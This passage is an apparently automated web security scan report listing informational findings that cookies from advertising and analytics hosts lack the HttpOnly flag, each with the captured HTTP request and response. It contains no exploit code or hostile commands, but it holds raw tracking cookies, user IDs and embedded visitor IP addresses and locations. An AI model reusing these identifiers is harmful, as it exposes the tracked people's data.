Set-Cookie: s_vi=[CS]v1|26DA098605162390-600001A0A001BFE4[CE]; Expires=Fri, 22 Apr 2016 12:09:48 GMT; Domain=.hotelclub.com; Path=/
Location: http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197?AQB=1&pccr=true&vidn=26DA098605162390-600001A0A001BFE4&&ndh=1&t=24/3/2011%207%3A9%3A50%200%20300&ce=ISO-8859-1&ns=flairviewtravel&pageName=Homepage&g=http%3A//www.hotelclub.com/&cc=USD&ch=Home%20page&server=www.hotelclub.com&v0=0&events=event7%2Cevent19%2Cevent4&v2=EN&c3=www.hotelclub.com&c4=EN&v5=www.hotelclub.com&v12=Non-member&v21=www.hotelclub.com&v29=USD&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 12:09:48 GMT
Last-Modified: Mon, 25 Apr 2011 12:09:48 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www605
Content-Length: 0
Content-Type: text/plain


14.32. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1303646989.757,wait-%3E10000,&1303646994271 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:09:48 2011&prad=253735207&arc=186884836&; BMX_G=method->-1,ts->1303646988; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:09:51 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303646989%2E757%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

14.33. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735207&AR_C=186884836 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:09:49 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:49 2011&recExp=Sun Apr 24 12:09:49 2011&prad=253735207&arc=186884836&; expires=Sat 23-Jul-2011 12:09:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303646989; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24700

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735207",Pid:"p97174789",Arc:"186884836",Location:
...[SNIP]...

14.34. http://at.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=2853&rnd=[cachebuster] HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUJOVvjFDHGBmzbDBIcekOVM7Pu2ADA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMrAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GBmAxjPqt5b8aYRoBABTNBsn

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUXD2qAp.o9VSb5yRFcRQS0cy3DIQDA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMrAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GIHOABrbWnU3DqIRAFGMGuw-; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 03:08:32 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ib.adnxs.com/seg?add=93909&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:31 GMT


14.35. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=1548627385 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 24 Apr 2011 12:29:52 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Tue, 23-Apr-2013 12:29:52 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

14.36. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=253735207&c4=186884836&c5=1&c6=1&c7=Sun%20Apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fwww.hotelclub.com%2Fcommon%2FadRevresda.asp%3Fchannel%3Dhome%26Section%3Dmain%26adsize%3D728x90%26pos%3Dbottom&c9=&c10=http%3A%2F%2Fwww.hotelclub.com%2F&c15=&1303646992514 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:09:48 2011&prad=253735207&arc=186884836&; BMX_G=method->-1,ts->1303646988; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 24 Apr 2011 12:09:49 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Tue, 23-Apr-2013 12:09:49 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


14.37. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=replace&advid=541&token=LIFL1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|534889.z2r8aytrpwakd.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F23%2F2011%3BLIFL1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Wed, 18-Apr-2012 03:08:32 GMT; Path=/
Set-Cookie: cwbh1=541%3B05%2F23%2F2011%3BLIFL1; Domain=.contextweb.com; Expires=Mon, 28-Mar-2016 03:08:32 GMT; Path=/
Content-Type: image/gif
Date: Sun, 24 Apr 2011 03:08:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

14.38. http://clk.atdmt.com/go/253732016/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /go/253732016/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/253732016/direct;ai.194941096;ct.1/01 HTTP/1.1
Host: clk.atdmt.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af; ach01=2a0cb15/120af/57ac7cf/903d/4db39163

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.lifelock.com/offers/faces/female/?promocodehide=ADCONIONRT&c3metrics=adcon
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=903d/120af:fb75/120af; expires=Tuesday, 23-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db41880; expires=Tuesday, 23-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sun, 24 Apr 2011 12:33:03 GMT
Connection: close


14.39. http://cmi.netseer.com/match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cmi.netseer.com
Path:   /match

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /match?ex=10&id=CAESELOuaNIo-ALjWWVJnFruZF0&cver=1 HTTP/1.1
Host: cmi.netseer.com
Proxy-Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"; netseer_v3_gp="1000,1,www.identityguard.com,0,0,4,pxl3fd3ead87a3ded68,1303614595694,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:EXTERNAL:1303614595018"

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Date: Sun, 24 Apr 2011 03:09:57 GMT
Server: Apache-Coyote/1.1
Set-Cookie: netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:CAESELOuaNIo-ALjWWVJnFruZF0:1303614597862"; Version=1; Domain=.netseer.com; Max-Age=63072000
Content-Length: 42
Connection: keep-alive

GIF89a.............!.......,...........D.;

14.40. http://cmi.netseer.com/redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cmi.netseer.com
Path:   /redirect

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /redirect?ex=10&t=1303614597199 HTTP/1.1
Host: cmi.netseer.com
Proxy-Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 24 Apr 2011 03:09:55 GMT
Location: http://cm.g.doubleclick.net/pixel?nid=netseer1
Server: Apache-Coyote/1.1
Set-Cookie: netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:EXTERNAL:1303614595018"; Version=1; Domain=.netseer.com; Max-Age=63072000
Content-Length: 0
Connection: keep-alive


14.41. http://ctix8.cheaptickets.com/dcscfchfzvz5bdrpz13vsgjna_9r8u/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ctix8.cheaptickets.com
Path:   /dcscfchfzvz5bdrpz13vsgjna_9r8u/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcscfchfzvz5bdrpz13vsgjna_9r8u/dcs.gif?&WT.Site=www.hotelclub.com&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Book%20Cheap%20Hotel%20Deals,%20Budget%20%26%20Luxury%20Accommodation%20|%20HotelClub&WT.js=Yes&WT.jv=1.5&WT.bs=980x907&WT.fi=Yes&WT.fv=10.2&WT.dl=0&WT.wtsv=1&WT.co_f=173.193.214.243-2165807168.30147192&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_sid=173.193.214.243-2165807168.30147192.1303646990479&hostname=www.hotelclub.com&owwPage=/&pos=HCLC&LNG=en_AU&avid=1129876971252011042422094&dcsdat=1303646990460&dcssip=www.hotelclub.com&dcsuri=/ HTTP/1.1
Host: ctix8.cheaptickets.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Sun, 24 Apr 2011 12:09:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcscfchfzvz5bdrpz13vsgjna_9r8u/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&WT.Site=www.hotelclub.com&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Book%20Cheap%20Hotel%20Deals,%20Budget%20%26%20Luxury%20Accommodation%20|%20HotelClub&WT.js=Yes&WT.jv=1.5&WT.bs=980x907&WT.fi=Yes&WT.fv=10.2&WT.dl=0&WT.wtsv=1&WT.co_f=173.193.214.243-2165807168.30147192&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_sid=173.193.214.243-2165807168.30147192.1303646990479&hostname=www.hotelclub.com&owwPage=/&pos=HCLC&LNG=en_AU&avid=1129876971252011042422094&dcsdat=1303646990460&dcssip=www.hotelclub.com&dcsuri=/
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yMTY1ODA3MTY4LjMwMTQ3MTkyAAAAAAABAAAAbgIBAAsTtE0LE7RNAQAAABQuAAALE7RNCxO0TQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


14.42. http://img167.imageshack.us/img167/6361/06ls4.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img167.imageshack.us
Path:   /img167/6361/06ls4.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img167/6361/06ls4.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: img167.imageshack.us

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sun, 24 Apr 2011 12:36:27 GMT
Content-Type: image/jpeg
Connection: close
Content-Length: 924976
Last-Modified: Wed, 23 Aug 2006 09:56:56 GMT
